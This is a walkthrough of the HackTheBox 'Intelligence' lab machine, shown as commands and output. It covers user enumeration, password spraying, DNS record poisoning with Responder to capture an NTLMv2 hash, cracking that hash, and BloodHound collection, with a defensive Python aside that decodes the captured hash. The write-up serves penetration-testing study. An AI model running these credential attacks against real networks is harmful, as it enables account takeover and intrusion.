HTB Intelligence done
Intelligence
OS:
Windows
Technology:
Active Directory
IP Address:
10.10.10.248
Open ports:
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-22 12:14:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49692/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Users and passwords:
Tiffany.Molina
NewIntelligenceCorpUser9876
Ted.Graves
Mr.Teddy
Password from metadata (pdf files)
NewIntelligenceCorpUser9876
Nmap
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat 10.10.10.248_nmap_vulns.nmap
# Nmap 7.93 scan initiated Sat Apr 22 01:12:02 2023 as: nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.248_nmap_vulns 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.038s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Intelligence
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-server-header: Microsoft-IIS/10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-22 12:14:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-22T12:19:41+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-04-22T12:19:40+00:00; +6h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-22T12:19:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-04-22T12:19:40+00:00; +6h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49692/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-22T12:15:22
|_ start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_smb-vuln-ms10-054: false
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 37.72 ms 10.10.14.1
2 38.12 ms 10.10.10.248
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 22 01:19:46 2023 -- 1 IP address (1 host up) scanned in 464.30 seconds
Add hostname to /etc/hosts
┌──(root㉿kali)-[~]
└─# echo "10.10.10.248 intelligence.htb0" >> /etc/hosts
┌──(root㉿kali)-[~]
└─# cat /etc/hosts | grep intellige
10.10.10.248 intelligence.htb0
Check page source
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ curl -sk http://10.10.10.248/ | grep "upload" | tr -d " "
<pclass="mb-0text-white-50"><ahref="documents/2020-01-01-upload.pdf"class="badgebadge-secondary">Download</a></p>
<pclass="mb-0text-white-50"><ahref="documents/2020-12-15-upload.pdf"class="badgebadge-secondary">Download</a></p>
Get metadata from all pdf files
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ python3 findpdfs.py | tee findpdfs_dumps
===http://10.10.10.248/documents/2020-06-04-upload.pdf===
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
===http://10.10.10.248/documents/2020-12-30-upload.pdf===
Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts.
User enumeration via Kerberos
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ /tmp/kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d intelligence.htb /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/04/23 - Ronnie Flathers @ropnop
2023/05/04 09:44:56 > Using KDC(s):
2023/05/04 09:44:56 > 10.10.10.248:88
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > [+] VALID USERNAME: [email protected]
2023/05/04 09:44:56 > Done! Tested 30 usernames (30 valid) in 0.118 seconds
List user names
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ /tmp/kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d intelligence.htb /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/users | awk '{print $NF}' | grep htb > kerberos_users
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat kerberos_users
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Password spraying
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876 --continue-on-success
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB 10.10.10.248 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
Show shares for user: Tiffany.Molina
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
[+] IP: 10.10.10.248:445 Name: intelligence.htb0
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
Read flag: user.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbclient -U Tiffany.Molina //10.10.10.248/Users
Password for [WORKGROUP\Tiffany.Molina]:
session setup failed: NT_STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbclient -U Tiffany.Molina //10.10.10.248/Users
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> cd Tiffany.Molina\Desktop
smb: \Tiffany.Molina\Desktop\> dir
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Thu May 4 14:40:22 2023
3770367 blocks of size 4096. 1461734 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> exit
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat user.txt
c2e88eb77a1141f1bc6111e2caf5ed1f
Lateral Movement
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
[+] IP: 10.10.10.248:445 Name: intelligence.htb0
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ smbclient -U Tiffany.Molina //10.10.10.248/IT
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1446959 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.8 KiloBytes/sec) (average 5.8 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        # Every DNS record whose name starts with "web" is fetched with the credentials of the account running the task
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
Add DNS records - dnstool.py
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ git clone https://github.com/dirkjanm/krbrelayx
Cloning into 'krbrelayx'...
remote: Enumerating objects: 183, done.
remote: Counting objects: 100% (85/85), done.
remote: Compressing objects: 100% (60/60), done.
remote: Total 183 (delta 42), reused 55 (delta 24), pack-reused 98
Receiving objects: 100% (183/183), 114.63 KiB | 729.00 KiB/s, done.
Resolving deltas: 100% (90/90), done.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ cd krbrelayx
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/krbrelayx]
└─$ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a modify -r web1 -d 10.10.14.7 -t A
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Modifying record
[+] LDAP operation completed successfully
Run Responder
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/krbrelayx]
└─$ responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[!] Responder must be run as root.
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/krbrelayx]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.7]
Responder IPv6 [dead:beef:2::1005]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MEE58TXDG0E]
Responder Domain Name [JLYI.LOCAL]
Responder DCE-RPC Port [49772]
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:a5a6266b262713a4:8ED592BE3A754EEBF46DBC228FC8C792:0101000000000000B4F031E8707FD9017D4ED97E8679A78900000000020008004A004C005900490001001E00570049004E002D004D004500450035003800540058004400470030004500040014004A004C00590049002E004C004F00430041004C0003003400570049004E002D004D0045004500350038005400580044004700300045002E004A004C00590049002E004C004F00430041004C00050014004A004C00590049002E004C004F00430041004C000800300030000000000000000000000000200000D1E66AAE14C4369510F7BD91142D7DD511E56062C0501C03E3886642042004640A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
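As an added example (not part of this writeup, of Responder or of any tool used here), the Python below decodes the NetNTLMv2 line captured above. The MS-NLMP target-info (AV_PAIR) block inside the blob records both the SPN the client meant to reach and the names the responding server placed in its NTLM challenge, so a defender can see from the blob alone that the account was authenticating to a host that is not web1. The input line is copied verbatim from the capture; the checks in `indicators()` are my own.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NetNTLMv2 line exactly as Responder printed it above: user::domain:srv_challenge:ntproofstr:blob
CAPTURED_LINE = (
    "Ted.Graves::intelligence:a5a6266b262713a4:8ED592BE3A754EEBF46DBC228FC8C792:"
    "0101000000000000B4F031E8707FD9017D4ED97E8679A78900000000"      # header, timestamp, client challenge, reserved
    "020008004A004C0059004900"                                      # MsvAvNbDomainName
    "01001E00570049004E002D004D004500450035003800540058004400470030004500"  # MsvAvNbComputerName
    "040014004A004C00590049002E004C004F00430041004C00"              # MsvAvDnsDomainName
    "03003400570049004E002D004D004500450035003800540058004400470030004500"
    "2E004A004C00590049002E004C004F00430041004C00"                  # MsvAvDnsComputerName
    "050014004A004C00590049002E004C004F00430041004C00"              # MsvAvDnsTreeName
    "0800300030000000000000000000000000200000"
    "D1E66AAE14C4369510F7BD91142D7DD511E56062C0501C03E388664204200464"  # MsvAvSingleHost
    "0A001000" "0000000000000000" "0000000000000000"                # MsvAvChannelBindings (all zero)
    "0900340048005400540050002F0077006500620031002E00"
    "69006E00740065006C006C006900670065006E0063006500" "2E00680074006200"  # MsvAvTargetName
    "0000000000000000"                                              # MsvAvEOL + trailing zeros
)

# AvId names from MS-NLMP section 2.2.2.1
AV_IDS = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
          4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags", 7: "MsvAvTimestamp",
          8: "MsvAvSingleHost", 9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
UTF16_IDS = (1, 2, 3, 4, 5, 9)


def filetime_to_datetime(ticks: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)


def parse_av_pairs(data: bytes) -> dict:
    """Walk the AV_PAIR list (AvId:u16 LE, AvLen:u16 LE, value) until MsvAvEOL."""
    pairs, offset = {}, 0
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        value = data[offset:offset + av_len]
        offset += av_len
        if av_id == 0:
            break
        name = AV_IDS.get(av_id, f"MsvAvUnknown{av_id}")
        if av_id in UTF16_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value.hex()
    return pairs


def parse_netntlmv2(line: str) -> dict:
    """Split a Responder/hashcat-style NetNTLMv2 line and decode the NTLMv2_CLIENT_CHALLENGE blob."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # RespType(1) HiRespType(1) Reserved(2) Reserved(4) TimeStamp(8) ClientChallenge(8) Reserved(4) AvPairs
    timestamp = struct.unpack_from("<Q", blob, 8)[0]
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "nt_proof_str": nt_proof,
        "resp_type": blob[0], "hi_resp_type": blob[1],
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": blob[16:24].hex(),
        "target_info": parse_av_pairs(blob[28:]),
    }


def indicators(parsed: dict) -> list:
    """Defender-side checks: does the server's self-declared identity match the SPN the client wanted?"""
    ti, findings = parsed["target_info"], []
    spn = ti.get("MsvAvTargetName", "")
    wanted_host = spn.split("/", 1)[1].lower() if "/" in spn else ""
    server_name = ti.get("MsvAvDnsComputerName", "").lower()
    if wanted_host and server_name and wanted_host != server_name:
        findings.append(f"client targeted {spn} but the server called itself {server_name}")
    if ti.get("MsvAvChannelBindings") == "00" * 16:
        findings.append("channel bindings are all zero: plain HTTP, no TLS channel binding (EPA)")
    return findings


if __name__ == "__main__":
    result = parse_netntlmv2(CAPTURED_LINE)
    print(result["user"], result["domain"], result["timestamp"].isoformat())
    for name, value in result["target_info"].items():
        print(f"  {name:22} {value}")
    for finding in indicators(result):
        print("!", finding)
```

The decoded MsvAvNbComputerName and MsvAvDnsDomainName (WIN-MEE58TXDG0E, JLYI.LOCAL) are exactly the "Current Session Variables" Responder printed above, which is what a DC-side review of the NTLM exchange would also see.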
Cracking hash
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ nano ted_graves_hash_kerberos
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ted_graves_hash_kerberos
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:05 DONE (2023-05-05 05:47) 0.1712g/s 1851Kp/s 1851Kc/s 1851KC/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Privilege Escalation
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Intelligence/bloodhound]
└─$ bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c All
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (intelligence.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The resolution lifetime expired after 3.203 seconds: Server 10.10.10.248 UDP port 53 answered The DNS operation timed out.; Server 10.10.10.248 UDP port 53 answered The DNS operation timed out.
INFO: Done in 00M 07S
Enumerate BloodHound
